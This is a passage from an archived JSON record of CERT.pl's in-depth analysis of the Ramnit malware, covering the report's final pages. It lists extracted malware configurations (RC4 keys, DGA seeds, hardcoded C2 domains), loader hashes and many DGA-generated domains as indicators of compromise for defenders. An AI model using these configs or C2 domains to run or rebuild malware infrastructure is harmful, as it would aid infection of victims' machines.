'45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'dsanfjiasfn22as.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3998246919, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'g283yr84iri4i.com'}\"\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 16 of 22\n\n\"{'config_type': 7, 'dga_seed': 4040478694, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'hye739indlir73ue.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 4096376725, 'dga_domain_no': 50, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'ju37yebdhf72938.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 4205202272, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'hd63ueor8473y.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 57607789, 'dga_domain_no': 15, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'bungetragecomedy9238.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 697527549, 'dga_domain_no': 10, 'rc4_key': 'fenquyidh',\r\n'config_magic': 'demetra', 'md5_magic': '45Bn99gT', 'port': 443, 'harcoded_domain':\r\n'h37eyrba720ui.com',}\"\r\n\"{'config_type': 7, 'dga_seed': 742724187, 'dga_domain_no': 50, 'rc4_key': 'fenquyidh',\r\n'config_magic': 'demetra', 'md5_magic': '45Bn99gT', 'port': 443, 'harcoded_domain':\r\n'okjndyeu3017uhe.com',}\"\r\nLoader sha256:\r\nd290225dde1b18bf68c4c42e06638a61fb336c91a2c4e6dd007bcbe7327fcbae\r\nc2cae7d9ef91dfcc1ae8f542e0ac64ce66c526d5a4154241855020612d358ee8\r\n1f3fbca46a599b4f221ead7785606451365db45bbbc537ee0c4d019e8984d106\r\n9d723bb1dc375834ebb907271b83dffab44e98b82fa73da6267037f019e4bc83\r\nf3567e2b5fc521987f0dd79aff6f3b1328db8e03fa825c3c030080a8b5819564\r\n7689465ba010537b0c29cf18d32a25962bd1605b717733f5953eb1b1eb0a68c9\r\nf98ca50b7d07682ac359b97dd68eb924c4cbd825db72c1a132458e9bb765fa1e\r\n4b00b0ece480267af051e7907458381d8a9e8506c7da67b8a8e1d74d45773d68\r\n6ac47d82134385fa73386ff3cd7b2eb7008da2205b3f5af7b41fab45c63f9046\r\n6a1fc689d2ef32ee6288498f8a875c6dc880d7494f46c05d25d0e1f627984e8e\r\n522e935b91307b8c01e0ea8a724985f5b4e01227a761aeccb63b00f0d964f7e9\r\nb3e67b5ee899c53f90c9da772592a4709372192542e1297bbce4929a8e1d5c69\r\n71d92cc6dc9273d162a969960b1021e5f18cf39b2c48043e5c5e49db5a58d955\r\nda15c2a89334496910b6d966bf91fa25a1c9526c53796e06d166416abe7cf2f4\r\ne4353bda9692581ea9743165dfd843238c23bb92e24b778983de80e90ac650a3\r\nDGA domains for analyzed configs:\r\nacncblsmbotliccnt.com\r\naeetbyamuwb.com\r\nahrkvtgc.com\r\naitlfdxgligxqow.com\r\naofmfaoc.com\r\naoylllsqihxxrvs.com\r\naruwggvopgxpah.com\r\natfpjouljn.com\r\nauqpdabknaty.com\r\nausprcogpngdpkaf.com\r\naynycxbgodmwi.com\r\nbekvfkxfh.com\r\nbheabfdfug.com\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 17 of 22\n\nbivaexusydnyp.com\r\nbjfwfqviu.com\r\nbnmokfrjpylxhvmwx.com\r\nbphnopydih.com\r\nbrluetauvqpyjlmwr.com\r\nbwnkdjlesbf.com\r\ncaosusubld.com\r\ncgvnwyfmh.com\r\ncitnngljfbhbqtlqlrn.com\r\ncjjugrow.com\r\ncqvtvnxtqsosfed.com\r\ncrocppgqdudtds.com\r\nctiprlgcxftdsaiqvk.com\r\nctmqakpbxbtk.com\r\ncxownbsefbc.com\r\ndameiuoflkwlswiqxcj.com\r\ndlkorrtundbuov.com\r\ndnjvsqdkisxqtbyghsm.com\r\ndpyimnktiverqymrpyt.com\r\ndvwtcefqgfnixlrdb.com\r\neadvtywooqmufnjo.com\r\nechrepdvcd.com\r\neibmornpk.com\r\nenyeikruptiukjorq.com\r\neppixrakqeueuttiuvi.com\r\nerwwbasmhtm.com\r\nesxfrepgcyyvoim.com\r\netmnmrpydwjsnftgoh.com\r\neukbhtrjtp.com\r\nfbhtsymefdwstuivosx.com\r\nfbnurqhsbun.com\r\nfbtsotbs.com\r\nfcvyvvbtdcswh.com\r\nffdjiuvufw.com\r\nfhvkufnnrlyfvx.com\r\nfkbpvfnbhfwedagussg.com\r\nfkhjonoadoojlxtna.com\r\nfkqrjsghoradylfslg.com\r\nfmsqakcxgr.com\r\nfnvweaywlctnxsi.com\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 18 of 22\n\nfownspjlwlwinayk.com\r\nfsysgean.com\r\ngcijrxipe.com\r\ngejsyavxw.com\r\ngfaronvw.com\r\nghvcoagkccor.com\r\ngrbjgfprk.com\r\ngrtkhmcxopofy.com\r\ngssbjwhoose.com\r\ngwlqggasgcluo.com\r\nhaqcdkwtukdegysigtv.com\r\nhivlcjcvux.com\r\nhtiobrofuirwkgn.com\r\nhvarfqrqddfof.com\r\nhvmwgkolgqsihrhhsd.com\r\nhvvflaobcvavhxcvrx.com\r\nijjsshatuadmd.com\r\ninmrmcrbeyrt.com\r\nirjeljgwfiaokbkcxnh.com\r\nisbwlnfiyevmi.com\r\niutwddseukcdplwpslq.com\r\niwdellebhavmei.com\r\njcuwfvvstbag.com\r\njdnpwbnnya.com\r\njhaiujfprlsbpyov.com\r\njhapjgvatltxunklfwk.com\r\njlaabpmergjoflssyg.com\r\nkbivgyaakcntdet.com\r\nkbodfwsbgfmoneuoj.com\r\nknohwiieytaae.com\r\nkntkuamkkrwaknrusx.com\r\nktxerynkliucejfsy.com\r\nlkmkkblchefeibicfjl.com\r\nlwqmgevnftflytvbgs.com\r\nmbtseiltigrijncw.com\r\nmdofetubarhorbvauf.com\r\nmfdpeurxwcevjrp.com\r\nmfvgfeqskjbdvgbk.com\r\nmngawiyhlyo.com\r\nmpfyngouhnboktq.com\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 19 of 22\n\nmrthpcokvjc.com\r\nmvpmnboacemupui.com\r\nmwqgwqcbllxhchd.com\r\nnfyetostisllhlm.com\r\nnhqtfnep.com\r\nnioqlfycvrlbt.com\r\nnldgdanoa.com\r\nnmcnknfccghddndnil.com\r\nnmrdnovjmcd.com\r\nnotalyyj.com\r\nnpcvnorvyhelagx.com\r\nntqchcmoegeif.com\r\nnvrnisdf.com\r\noawvuycoy.com\r\nocpjduiabgt.com\r\noeuwldhkrnvxg.com\r\nogltynjmtfiu.com\r\nonaxjbfinflx.com\r\noxxvnflhtpomjmwst.com\r\npbbwplaqmqmlaehwjkc.com\r\npkjkgprlgtu.com\r\nqdvmstrtkslghpmunuk.com\r\nqegdtnvuanlyid.com\r\nqislvfqqp.com\r\nqjsqolupmciuvjdum.com\r\nqlxuubxxxctvfcdajw.com\r\nqmbmbyqkltqfbbtxxc.com\r\nqnpuwhcfaqpsmrns.com\r\nqoraprfuu.com\r\nrbpyoxmokgfdpphixk.com\r\nrclsurjwyrjqoebrqti.com\r\nrgcakqlu.com\r\nrggwfijbqmfysgpbgcc.com\r\nrghwarmlxmqivfmcs.com\r\nrgmxtsagmcvrrkofdkn.com\r\nrlkeqcsygmmglv.com\r\nrmprupuvboixif.com\r\nrycvrswhnhygtj.com\r\nsamtbqdmwqnp.com\r\nsaqjrigpkuins.com\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 20 of 22\n\nshebkucvrunporc.com\r\nsihpxpjjgtrbrmnogr.com\r\nsinjydtrv.com\r\nskucfggcidnmjowl.com\r\nsmelxehyqouw.com\r\nsmsyalkclunrd.com\r\nsmxkflittvmpij.com\r\nsnxplvbkwja.com\r\nsxwksoxeyapmrqldisp.com\r\ntbkgkcohpmbwrdsreyf.com\r\ntinjahjgsutmdj.com\r\ntmgmgjcvt.com\r\ntswgqcseq.com\r\nuacwwgvrdgqscbwb.com\r\nuahvwkjphhklqigod.com\r\nuclrmwkfanhh.com\r\nuegkbhbacte.com\r\nvbqyhprpdgum.com\r\nvckiyseyoembwipx.com\r\nvenexqliewgrpyaai.com\r\nvfldtglyewhwrl.com\r\nviyiphasemwchbpuqf.com\r\nvjcowraocpfirjotrib.com\r\nvpfhpoldbd.com\r\nvqrsxslnbqt.com\r\nvutptwpxhkgjeqll.com\r\nwarylmiwgo.com\r\nwbrmgnjowapb.com\r\nwdgqvaya.com\r\nwewdxpjmgugtefugid.com\r\nwglxvkpybhnxhfv.com\r\nwgpvglbadxo.com\r\nwgwuhauaqcrx.com\r\nwhepgbwulfnbw.com\r\nwiulqdhkoqmih.com\r\nwjexvkfoquhsfngmu.com\r\nwmrsfhcaqspdg.com\r\nwrfjivmimqajugdqtul.com\r\nwstujheiancyv.com\r\nwwteytsfaiyrrg.com\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 21 of 22\n\nwwyreaohjbdyrajxif.com\r\nwxrbiscgahcnxq.com\r\nwxxlrbjfyauvrpqfuv.com\r\nwydvmjaantfg.com\r\nxkrndqbrwnayscq.com\r\nxntkgmrk.com\r\nxnvxmdujhycgicmgso.com\r\nxomeommdilsq.com\r\nxrgahbllandvrrohfkp.com\r\nxtcigtnylu.com\r\nxxkdbpcrygynpcwujdx.com\r\nxxsmtenwak.com\r\nxynixjxxkgmxs.com\r\nybhiodxwwmoymuv.com\r\nycggtsjmdvqhsel.com\r\nydchosmhwljjrq.com\r\nydwqpuwjpxij.com\r\nyeaysjbfeytrky.com\r\nygqqaluei.com\r\nyipxgadyonkkdjqoraa.com\r\nykvhpxixrqgid.com\r\nynnwhiuoxqyjxrfqa.com\r\nypairkaitcljoq.com\r\nypfptjsuthmaaebx.com\r\nypwosgnjytynbqin.com\r\nyqhkusykmqu.com\r\nyrkbpnnlxrxrbpett.com\r\nSource: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "NL",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/"
	],
	"report_names": [
		"ramnit-in-depth-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434783,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.pdf",
		"text": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.txt",
		"img": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.jpg"
	}
}